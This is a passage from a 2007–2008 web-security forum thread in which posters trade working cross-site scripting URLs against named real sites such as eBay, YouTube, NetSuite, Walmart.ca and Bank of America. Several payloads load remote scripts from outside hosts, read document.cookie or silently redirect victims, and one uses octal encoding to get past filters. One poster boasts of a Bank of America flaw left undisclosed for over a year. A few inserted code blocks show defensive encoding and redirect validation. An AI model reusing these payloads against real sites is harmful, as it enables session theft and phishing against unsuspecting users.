Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Current Page: 55 of 65
Re: So it begins
Posted by: nemessis
Date: December 06, 2007 11:37PM

This is a better formula Fugitif :)

hxxp://togo.ebay.com/app/auctionfinder.php?query=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&page&seller&category=&TZ=-120&block=list

Re: So it begins
Posted by: timoleary71
Date: December 08, 2007 02:27AM

www.teachertube.com

Nothing is checked. I can insert into picture URL, video comment, Firstname/ lastname, etc
click on first video:

hxxp://www.teachertube.com/view_video.php?viewkey=e6d0b40c72b279ebdf76



www.clipshare.com < clipshare software.
Login- Goto Send a message.
send a message with subject & body of:
>"><script>location="hxxp://www.geocities.com/timoleary71/"</script>
If the person tries to open their inbox, they don't even need to click on the message; they get auto-redirected. Also, you can put it inside the "Location Recorded" field of a video upload. Anytime someone tries to view the video...



Edited 3 time(s). Last edit at 12/08/2007 02:48AM by timoleary71.

Re: So it begins
Posted by: timoleary71
Date: December 08, 2007 03:25PM

Injection...


http://www.paxpartnership.org/calendar/index.cfm?fuseaction=ViewEventDetails&EventID=1
Inject into EventID...

Re: Another ones
Posted by: iota
Date: December 14, 2007 08:56AM


Re: So it begins
Posted by: nEUrOO
Date: December 16, 2007 12:35PM

hxxp://www.engadget.com/search/?q=test''\"onmouseover='alert(0)'style='position:absolute;top:-500px;left:-5000px;width:100000px;height:10000px;z-index:99999;'onerror="

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Re: So it begins
Posted by: maluc
Date: December 20, 2007 01:02AM

This site is well guarded against XSS in every form and parameter.. but they didn't make sure to filter arbitrary parameter names

http://my.convio.com/?elqPURLPage=7&notaparameter=--%3E%3C/script%20v=b%3E%3Cscript%20src=%22http://ha.ckers.org/s%22%3E

-maluc
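
The gap described in the post above (values are filtered, parameter names are echoed as-is) is closed by treating every reflected name like a value. This is an added example, not code from the thread or from the site; the hidden-field rendering, the function names and the sample query are assumptions.

```javascript
// Added example: when a page echoes the query string back into HTML,
// parameter NAMES are user-controlled too and need the same output
// encoding as values. All names below are hypothetical.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Constructed sample: one expected parameter, one unexpected parameter
// whose NAME carries markup (percent-encoded on the wire).
const SAMPLE_QUERY = 'elqPURLPage=7&%22%3E%3Cb%3Enotaparameter=x';

// Weak pattern: values are encoded, names are trusted.
function renderFieldsValuesOnly(query) {
  const out = [];
  for (const [name, value] of new URLSearchParams(query)) {
    out.push(`<input type="hidden" name="${name}" value="${escapeHtml(value)}">`);
  }
  return out.join('\n');
}

// Corrected pattern 1: only parameters the page expects are reflected,
// and both name and value are encoded for the attribute they land in.
function renderExpectedFields(query, expectedNames) {
  const out = [];
  for (const [name, value] of new URLSearchParams(query)) {
    if (!expectedNames.has(name)) continue; // unknown name: never reflected
    out.push(`<input type="hidden" name="${escapeHtml(name)}" value="${escapeHtml(value)}">`);
  }
  return out.join('\n');
}

// Corrected pattern 2: pages that must echo arbitrary parameters encode
// every name as well as every value.
function renderAllFieldsEncoded(query) {
  const out = [];
  for (const [name, value] of new URLSearchParams(query)) {
    out.push(`<input type="hidden" name="${escapeHtml(name)}" value="${escapeHtml(value)}">`);
  }
  return out.join('\n');
}
```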

Re: So it begins
Posted by: maluc
Date: December 20, 2007 01:07AM

my uni https://cs7000a.uta.edu/logon?--%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C!--a

-maluc

Re: So it begins
Posted by: rsnake
Date: December 30, 2007 02:47PM

This was vaguely difficult to find due to some XSS protection in place, some browser dependencies and some unreliable server issues. This company just went public (sounds like a good company too, I might add). The URL is HTTPS, making it slightly more interesting (the XSS exploit works only in IE and pops up infinite alerts as long as your mouse is over the body of the page):

https://system.netsuite.com/pages/pwdreset.jsp?email=shopper%40nlcorp.com&answer1="style="width:expression(alert(document.cookie))&answer2=&answer3=&submitter=Submit

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: krazl
Date: January 03, 2008 02:26AM

This is top Malaysia newspaper.

http://www.utusan.com.my/utusan/keyword_search.asp?NewString=<script>alert(1)</script>

a simple straight forward!!

krazl
www.krazl.com

http://www.krazl.com

Re: So it begins
Posted by: gerry
Date: January 04, 2008 03:24PM

http://www.stumbleupon.com/create_campaign.php?url=%22/%3E%3Cscript%3Ealert(1);%3C/script%3E%3Cx=%22
http://www.youtube.com/comment_servlet?all_comments&v=IoXgRtDysLY&fromurl=%2f%2522%253E%253C/a%253E%253Cscript%253Ealert(1)%3b%253C/script%253E%253Cx=%2522

-g
[hiredhacker.com]

Re: So it begins
Posted by: rsnake
Date: January 05, 2008 10:08AM

Very nice, gerry!

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: gerry
Date: January 05, 2008 03:04PM

Thanks. Here's one for ebay too

http://pages.ebay.com/help/policies/index.html?fromFeature=Advanced%20Search%3C/a%3E%3CSCRIPT/**/SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E

It requires the user to have already visited ebay, or for the request to be reloaded as it is only displayed when there is a history. I need to look at the logic more to see if it can be worked around, but figured if someone is interested they can do it ;)

-g
[hiredhacker.com]

Re: So it begins
Posted by: nemessis
Date: January 05, 2008 05:56PM

hxxp://www.youtube.com/my_profile_organize?type="><script>alert("You%20must%20to%20be%20logged%20in%20to%20see%20this%20alert")</script>&user=Nemessis

You need to be logged in to your youtube account.

http://www.rstcenter.com - Romanian Security Team
Limousine rentals

Re: So it begins
Posted by: apnovi
Date: January 08, 2008 05:10AM

http://www.biguard.com/reg_emailverify.php?sn=1&e=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Re: So it begins
Posted by: tx
Date: January 08, 2008 05:41PM

http://www.gamefly.com/products/search.asp?k=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E%3Cp&pf=&sub=1&sb=mostpop&spsrch.x=0&spsrch.y=0
https://www.gamefly.com/member/reg0.asp?tp=&re=/member/account.asp?&pr=&p=0&gcid=&gctp=0&pue=&fc=&un=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&pw=&forgotpw=0&submit.x=0&submit.y=0
I was only here because I wanted to sign up for an account... but not anymore: http://www.gamefly.com/products/search.asp?k=&pf=0&cat=2&sb=mostpop&pg=1&letter='&s=&t=0&next.x=29&next.y=8

EDIT: Didn't feel like making a new post:
http://tell-a-friend-wizard.com/cgi-bin/tell_opt_gold.cgi?uid=%22%3E%3Cscript%3Ealert%28%27xss1%27%29%3C/script%3E&url=%22%3E%3Cscript%3Ealert%28%27xss2%27%29%3C/script%3E&captcha=%22%3E%3Cscript%3Ealert%28%27xss3%27%29%3C/script%3E

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 01/10/2008 05:16PM by tx.

Re: So it begins
Posted by: nav
Date: January 14, 2008 01:19PM

Wanna go shopping? Just mouse over the search box.

http://walmart.ca/wps-portal/storelocator/Canada-FeaturedPage.jsp?selection=listing&tabId=22&&&categoryId=582&currentPage=5&departmentId=17&lang=&searchQuery=%22%20onmousemove=%22alert(1)%22%20size=%221&tabId=22

Re: So it begins
Posted by: tx
Date: January 14, 2008 01:42PM

Identity theft protection:
https://www.selectidtheftprotection.com/scripts/externalpromo.asp?ref=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E

-tx @ lowtech-labs.org

Re: So it begins
Posted by: krazl
Date: January 14, 2008 10:23PM

Is it possible to put a government website here? Let me know rsnake...

krazl
www.krazl.com

http://www.krazl.com

Re: So it begins
Posted by: id
Date: January 15, 2008 02:26PM

There are several in this thread, go ahead.

-id

Re: So it begins
Posted by: Jiu
Date: January 18, 2008 12:10PM

ch.tillate.com (dunno if that works on other country)

send message

Title: ')" onmouseover=alert(1); o

Works on firefox, didn't try on IE ^^

Re: So it begins
Posted by: gerry
Date: January 19, 2008 03:51PM


Re: So it begins
Posted by: gerry
Date: January 20, 2008 06:59PM

[www.nfl.com]
[www.nfl.com]
[www.patriots.com]
[www.patriots.com]

-g
[hiredhacker.com]



Edited 1 time(s). Last edit at 01/20/2008 07:01PM by gerry.

Re: So it begins
Posted by: kirke
Date: January 31, 2008 03:15PM

remove all spaces and replace all e by m which avoids Eval, iframE, String.fromCharCode, etc. etc.
Is this safe? You all know ...

Quote

http://verivox.de/Power/Calculator.asp?31=on&No=40&51=on&52=on&54=on&lookup=true&leistungsmessung=no&radio1=1&plz=01234&11=31337%22onfocus=%22top['\145\166\141\154']('\144\157\143\165\155\145\156\164\56\167\162\151\164\145\154\156\50\47\74\142\157\144\171\76\74\163\143\162\151\160\164\40\163\162\143\75\42\57\57\150\141\56\143\153\145\162\163\56\157\162\147\57\163\42\76\74\57\163\143\162\151\160\164\76\74\57\142\157\144\171\76\47\51\73');&customer=priv&submit1=vergleichen

(uses onfocus)

Lesson learned: forget about any sanitation;-)

--
Edit: ubb's url tag is too stupid for sophisticated links:-/



Edited 1 time(s). Last edit at 02/01/2008 04:26AM by kirke.
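
Why a character-rewriting filter like the one in the post above does not help, shown from the defender's side: it leaves the double quote that ends the attribute, while encoding for the attribute context removes the boundary character itself. This is an added example, not the site's code; the filter is reconstructed from the post's one-line description, and the form field and sample value are assumptions.

```javascript
// Assumption: the filter as the post describes it, i.e. remove all spaces
// and replace every "e"/"E" with "m". Not the site's actual code.
function describedFilter(value) {
  return String(value).replace(/ /g, '').replace(/e/gi, 'm');
}

// Attribute-context encoder: everything except ASCII letters and digits
// becomes a numeric character reference, so no input character can close
// the quoted attribute or begin a new one.
function encodeForHtmlAttribute(value) {
  return Array.from(String(value), (ch) =>
    /[A-Za-z0-9]/.test(ch) ? ch : `&#x${ch.codePointAt(0).toString(16)};`
  ).join('');
}

// Hypothetical form field that reflects the "11" parameter.
function renderField(value, encoder) {
  return `<input type="text" name="11" value="${encoder(value)}">`;
}

// The template itself contributes exactly six double quotes (three quoted
// attributes). Any extra quote means the value escaped its attribute.
function staysInsideAttribute(html) {
  return (html.match(/"/g) || []).length === 6;
}

// Constructed, harmless sample value containing a quote and a space.
const SAMPLE_VALUE = '31337" data-extra="1';

function compareDefences(value) {
  return {
    filtered: staysInsideAttribute(renderField(value, describedFilter)),
    encoded: staysInsideAttribute(renderField(value, encodeForHtmlAttribute)),
  };
}
```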

Re: So it begins
Posted by: nEUrOO
Date: February 02, 2008 06:29PM

hxxp://www.archive.org/search.php?query=%22%3C%2Ftitle%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E
It's actually interesting that I had to put the " first, otherwise it would have removed every <
Some filters are actually strange :/

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher



Edited 1 time(s). Last edit at 02/02/2008 06:30PM by nEUrOO.

Re: So it begins
Posted by: tx
Date: February 08, 2008 01:37PM

This is for that crappy article: http://comments.cio.com/node/176250?page=%22%3Balert%28%27xss%27%29%3B//

-tx @ lowtech-labs.org

Re: So it begins
Posted by: Anonymous User
Date: February 08, 2008 01:48PM

--Deleted by request--



Edited 4 time(s). Last edit at 07/01/2010 10:04AM by rsnake.

Re: So it begins
Posted by: Gareth Heyes
Date: February 08, 2008 02:47PM

@tx

Hehe I like it nice1 :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: So it begins
Posted by: tx
Date: February 11, 2008 04:07PM

XSS via their open redirect page:
http://www.globalsecurity.org/cgi-bin/texis.cgi/webinator/search/redir.html?u=javascript%3Aalert%28document.domain%29%22onmouseover%3D%22alert%28document.cookie%29

-tx @ lowtech-labs.org
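
A redirect page that reflects its target needs two checks that the one in the post above lacks: the target must parse as an absolute http(s) URL on an expected host, and it must be HTML-encoded where it is written into the page. This is an added example, not the site's code; the allowed hosts, function names and sample inputs are assumptions.

```javascript
// Added example: validate a redirect target, then encode it on output.
// Hosts and names are hypothetical placeholders.
const ALLOWED_REDIRECT_HOSTS = new Set(['www.example.org', 'docs.example.org']);

function safeRedirectTarget(raw, allowedHosts = ALLOWED_REDIRECT_HOSTS) {
  let url;
  try {
    url = new URL(String(raw)); // absolute URLs only; relative input throws
  } catch (err) {
    return null;
  }
  // Scheme allowlist: javascript:, data:, vbscript: and anything else
  // that is not plain web navigation is rejected here.
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return null;
  // Embedded credentials are a common way to disguise the real host.
  if (url.username !== '' || url.password !== '') return null;
  if (!allowedHosts.has(url.hostname)) return null;
  return url.href; // normalized serialization from the URL parser
}

function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Interstitial page: the validated target is still encoded for the
// attribute and text contexts it is written into.
function renderRedirectPage(raw) {
  const target = safeRedirectTarget(raw);
  if (target === null) return '<p>Invalid redirect target.</p>';
  const encoded = escapeHtml(target);
  return `<p>Continue to <a href="${encoded}">${encoded}</a></p>`;
}
```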

Re: So it begins
Posted by: unsticky
Date: February 11, 2008 09:13PM

http://h-date.com/login.jsp?login=%22%3E%3Cscript%20src=%22http://bryanlies.com/x.js%22%3E%3C/script%3E&password=&Submit=Login
^ don't ask...

http://photobucket.com/mediadetail/?media=http://pic.photobucket.com/../logos/';alert(document.cookie);%3C/script%3E/PBLogo.166.BG.white.gif&searchTerm=&pageOffset=1
http://photobucket.com/mediadetail/?media=http://pic.photobucket.com/../logos/PBLogo.166.BG.white.gif&searchTerm=%22%3E%3Cscript/src=%22http://bryanlies.com/x.js%22%3E%3C/script%3E&pageOffset=1

oh, and hi.

Re: So it begins
Posted by: maluc
Date: February 14, 2008 12:05AM

http://www.bankofamerica.com/state.cgi?section=contact&update=yes&cookiecheck=yes&lob=asdf%22%20style=%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss')%22%20k

This has been live and undisclosed for at least over a year that I've had it saved.. still works ^^
I no longer have a BoA account to use it further, however.

-maluc
